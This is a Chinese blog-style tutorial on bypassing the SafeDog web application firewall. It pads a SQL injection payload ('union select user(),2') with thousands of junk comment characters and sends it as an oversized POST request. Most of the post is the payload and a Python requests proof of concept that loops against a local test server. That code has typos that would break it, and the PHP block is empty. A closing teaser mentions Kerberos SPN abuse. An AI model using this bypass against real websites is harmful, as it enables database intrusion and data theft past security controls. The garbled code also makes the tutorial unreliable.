sql注入绕过安全狗及python poc

  • A+

0x01 实验环境准备

1.安全狗一只
2.phpstudy一枚
3.python3及requests库一枚
4.burp一枚

0x02 php代码

```

```
首先连接localhost数据库账号root密码root
之后创建一个test数据库users表

0x03 实战开始

id不需要闭合为了省事 直接查用户
http://192.168.0.106/zr.php?id=1union select user(),2 发现直接拦截

QQ图片20200210140245.jpg

掏出我的大保健,当安全狗遇到超大数据包,会处理不过来直接扔给后端去处理。从而可以绕过。get方式的话肯定是不可行的,直接换成post。

下面是我用python写的一个简单的poc (通过叠加无用字符进行绕过)

payload:1/无用的字符/ union select user(),2
```
import requests
url = "http://192.168.0.106/zr.php"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0"
}
try:
for i in range(1,5000):
st = "/"+"ABC"i+"*/ union select user(),2"
data={
"id":"1 %s " %st
}
print(i)
res= requests.post(url,headers=headers,data=data).text
print(data)
print(res)
except:
print('终止执行')

```

QQ图片20200210140301.jpg
之后将这些内容放到burp里面,转为post方式并提交

QQ图片20200210140305.jpg
成功绕过!!!

相关推荐: Keberos之SPN及其利用

Keberos之SPN及其利用 关于SPN 服务主体名称(SPN:ServicePrincipal Names)是服务实例(可以理解为一个服务,比如 HTTP、MSSQL)的唯一标识符。 如果在整个林或域中的计算机上安装多个服务实例,则每个实例都必须具有自己的…